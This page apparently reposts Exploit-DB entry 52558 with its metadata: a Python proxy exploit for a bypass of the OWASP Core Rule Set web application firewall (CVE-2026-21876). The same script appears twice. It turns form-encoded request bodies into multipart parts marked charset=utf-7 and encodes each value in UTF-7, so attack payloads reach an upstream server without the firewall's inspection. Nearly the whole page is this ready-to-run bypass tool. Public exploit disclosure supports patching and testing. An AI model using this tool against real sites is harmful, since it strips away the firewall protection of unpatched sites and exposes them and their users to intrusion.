coreruleset 4.21.0 – Firewall Bypass_EDB-ID:52558

9.3 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Description

Exploit Title: coreruleset 4.21.0 - Firewall Bypass Date: 04/08/2026 Exploit Author: Daytrift Newgen Vendor Homepage: https://github.com/coreruleset Software Link: https://github.com/coreruleset/coreruleset Version: 4.22.0/3.3.8 Tested on: Fedora,...

Visit Original Source

Basic Information

ID EDB-ID:52558

Published May 13, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: coreruleset 4.21.0 - Firewall Bypass
# Date:* 04/08/2026*
# Exploit Author: Daytrift Newgen
# Vendor Homepage: https://github.com/coreruleset
# Software Link: https://github.com/coreruleset/coreruleset
# Version: < 4.22.0/3.3.8
# Tested on: Fedora, MacOS
# CVE : CVE-2026-21876

import base64
import os
from cgi import parse_header
from urllib.parse import parse_qsl

from aiohttp import web, ClientSession, MultipartWriter
from yarl import URL

# Target
UPSTREAM = os.getenv("UPSTREAM", "http://host:8083")

HOP_BY_HOP_HEADERS = {
"connection",
"keep-alive",
"proxy-authenticate",
"proxy-authorization",
"te",
"trailer",
"transfer-encoding",
"upgrade",
}

def _make_upstream_url(request):
base = URL(UPSTREAM)
return str(
base.with_path(request.rel_url.path).with_query(request.rel_url.query)
)

def _copy_headers_for_upstream(request):
headers: dict[str, str] = {}
for k, v in request.headers.items():
lk = k.lower()
if lk in HOP_BY_HOP_HEADERS:
continue
if lk in {"host", "content-length"}:
continue
if lk == "content-type":
continue
headers[k] = v
return headers

def _utf7_encode(text):
result = b""
for char in text:
utf16_bytes = char.encode('utf-16-be')
b64 = base64.b64encode(utf16_bytes).rstrip(b'=')
result += b'+' + b64 + b'-'
return result

def _form_urlencoded_to_multipart(body, content_type):
_, params = parse_header(content_type or "")
charset = params.get("charset", "utf-8")

text = body.decode(charset, errors="replace")
pairs = parse_qsl(text, keep_blank_values=True, strict_parsing=False, encoding=charset, errors="replace")

mp = MultipartWriter("form-data")
for key, value in pairs:
part = mp.append(_utf7_encode(value))
part.headers["Content-Type"] = "text/plain; charset=utf-7"
part.set_content_disposition("form-data", name=key)

part2 = mp.append('a'.encode("utf-8"))
part2.set_content_disposition("form-data", name="aBdC401")
part2.headers["Content-Type"] = "text/plain; charset=utf-8"

return mp, mp.content_type

async def handle(request):
upstream_url = _make_upstream_url(request)
headers = _copy_headers_for_upstream(request)

content_type = request.headers.get("Content-Type", "")
body = await request.read()

data = body
if content_type.startswith("application/x-www-form-urlencoded"):
mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type)
data = mp
headers["Content-Type"] = mp_content_type

async with request.app["session"].request(
method=request.method,
url=upstream_url,
headers=headers,
data=data,
allow_redirects=False,
# proxy="http://127.0.0.1:8080",
) as resp:
resp_body = await resp.read()
response_headers = {
k: v for k, v in resp.headers.items()
if k.lower() not in HOP_BY_HOP_HEADERS
}

return web.Response(
status=resp.status,
headers=response_headers,
body=resp_body,
)

async def on_startup(app):
app["session"] = ClientSession()

async def on_cleanup(app):
await app["session"].close()

app = web.Application(client_max_size=50 * 1024 * 1024)
app.router.add_route("*", "/{tail:.*}", handle)
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)

if __name__ == "__main__":
# Local proxy
web.run_app(app, host="0.0.0.0", port=8085)

{
    "lastseen": "2026-05-13T13:44:39",
    "description": "Exploit Title: coreruleset 4.21.0 - Firewall Bypass Date: 04/08/2026 Exploit Author: Daytrift Newgen Vendor Homepage: https://github.com/coreruleset Software Link: https://github.com/coreruleset/coreruleset Version: 4.22.0/3.3.8 Tested on: Fedora,...",
    "published": "2026-05-13T00:00:00",
    "modified": "2026-05-13T00:00:00",
    "type": "exploitdb",
    "title": "coreruleset 4.21.0 - Firewall Bypass",
    "source": "",
    "references": "",
    "id": "EDB-ID:52558",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-21876"
    ],
    "sourceData": "# Exploit Title: coreruleset 4.21.0 - Firewall Bypass\r\n# Date:* 04/08/2026*\r\n# Exploit Author: Daytrift Newgen\r\n# Vendor Homepage: https://github.com/coreruleset\r\n# Software Link: https://github.com/coreruleset/coreruleset\r\n# Version: < 4.22.0/3.3.8\r\n# Tested on: Fedora, MacOS\r\n# CVE : CVE-2026-21876\r\n\r\n\r\nimport base64\r\nimport os\r\nfrom cgi import parse_header\r\nfrom urllib.parse import parse_qsl\r\n\r\nfrom aiohttp import web, ClientSession, MultipartWriter\r\nfrom yarl import URL\r\n\r\n# Target\r\nUPSTREAM = os.getenv(\"UPSTREAM\", \"http://host:8083\")\r\n\r\nHOP_BY_HOP_HEADERS = {\r\n    \"connection\",\r\n    \"keep-alive\",\r\n    \"proxy-authenticate\",\r\n    \"proxy-authorization\",\r\n    \"te\",\r\n    \"trailer\",\r\n    \"transfer-encoding\",\r\n    \"upgrade\",\r\n}\r\n\r\ndef _make_upstream_url(request):\r\n    base = URL(UPSTREAM)\r\n    return str(\r\n        base.with_path(request.rel_url.path).with_query(request.rel_url.query)\r\n    )\r\n\r\ndef _copy_headers_for_upstream(request):\r\n    headers: dict[str, str] = {}\r\n    for k, v in request.headers.items():\r\n        lk = k.lower()\r\n        if lk in HOP_BY_HOP_HEADERS:\r\n            continue\r\n        if lk in {\"host\", \"content-length\"}:\r\n            continue\r\n        if lk == \"content-type\":\r\n            continue\r\n        headers[k] = v\r\n    return headers\r\n\r\ndef _utf7_encode(text):\r\n    result = b\"\"\r\n    for char in text:\r\n        utf16_bytes = char.encode('utf-16-be')\r\n        b64 = base64.b64encode(utf16_bytes).rstrip(b'=')\r\n        result += b'+' + b64 + b'-'\r\n    return result\r\n\r\n\r\ndef _form_urlencoded_to_multipart(body, content_type):\r\n    _, params = parse_header(content_type or \"\")\r\n    charset = params.get(\"charset\", \"utf-8\")\r\n\r\n    text = body.decode(charset, errors=\"replace\")\r\n    pairs = parse_qsl(text, keep_blank_values=True, strict_parsing=False, encoding=charset, errors=\"replace\")\r\n\r\n    mp = MultipartWriter(\"form-data\")\r\n    for key, value in pairs:\r\n        part = mp.append(_utf7_encode(value))\r\n        part.headers[\"Content-Type\"] = \"text/plain; charset=utf-7\"\r\n        part.set_content_disposition(\"form-data\", name=key)\r\n\r\n    part2 = mp.append('a'.encode(\"utf-8\"))\r\n    part2.set_content_disposition(\"form-data\", name=\"aBdC401\")\r\n    part2.headers[\"Content-Type\"] = \"text/plain; charset=utf-8\"\r\n    \r\n    return mp, mp.content_type\r\n\r\nasync def handle(request):\r\n    upstream_url = _make_upstream_url(request)\r\n    headers = _copy_headers_for_upstream(request)\r\n\r\n    content_type = request.headers.get(\"Content-Type\", \"\")\r\n    body = await request.read()\r\n\r\n    data = body\r\n    if content_type.startswith(\"application/x-www-form-urlencoded\"):\r\n        mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type)\r\n        data = mp\r\n        headers[\"Content-Type\"] = mp_content_type\r\n\r\n    async with request.app[\"session\"].request(\r\n        method=request.method,\r\n        url=upstream_url,\r\n        headers=headers,\r\n        data=data,\r\n        allow_redirects=False,\r\n#       proxy=\"http://127.0.0.1:8080\",\r\n    ) as resp:\r\n        resp_body = await resp.read()\r\n        response_headers = {\r\n            k: v for k, v in resp.headers.items()\r\n            if k.lower() not in HOP_BY_HOP_HEADERS\r\n        }\r\n\r\n    return web.Response(\r\n            status=resp.status,\r\n            headers=response_headers,\r\n            body=resp_body,\r\n        )\r\n\r\nasync def on_startup(app):\r\n    app[\"session\"] = ClientSession()\r\n\r\nasync def on_cleanup(app):\r\n    await app[\"session\"].close()\r\n\r\napp = web.Application(client_max_size=50 * 1024 * 1024)\r\napp.router.add_route(\"*\", \"/{tail:.*}\", handle)\r\napp.on_startup.append(on_startup)\r\napp.on_cleanup.append(on_cleanup)\r\n\r\nif __name__ == \"__main__\":\r\n    # Local proxy\r\n    web.run_app(app, host=\"0.0.0.0\", port=8085)",
    "sourceHref": "https://www.exploit-db.com/raw/52558",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52558",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply